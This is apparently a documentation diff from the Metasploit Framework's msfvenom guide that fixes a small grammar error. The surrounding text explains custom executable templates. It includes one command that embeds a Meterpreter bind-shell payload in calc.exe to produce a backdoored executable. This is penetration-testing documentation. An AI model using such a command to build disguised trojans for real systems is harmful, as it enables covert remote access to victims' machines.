rapid7/metasploit-framework/How-to-use-msfvenom.md

 **How to supply a custom template**

 By default, msfvenom uses templates from the msf/data/templates directory.
-If you like to choose your own, you can use the -x flag like the following:
+If you'd like to choose your own, you can use the -x flag like the following:

 ```
 ./msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -f exe > new.exe